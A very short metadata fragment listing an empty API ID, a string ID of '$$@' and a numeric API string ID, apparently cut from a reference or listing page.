• API ID:
• String ID: $$@
• API String ID: 0-1194432280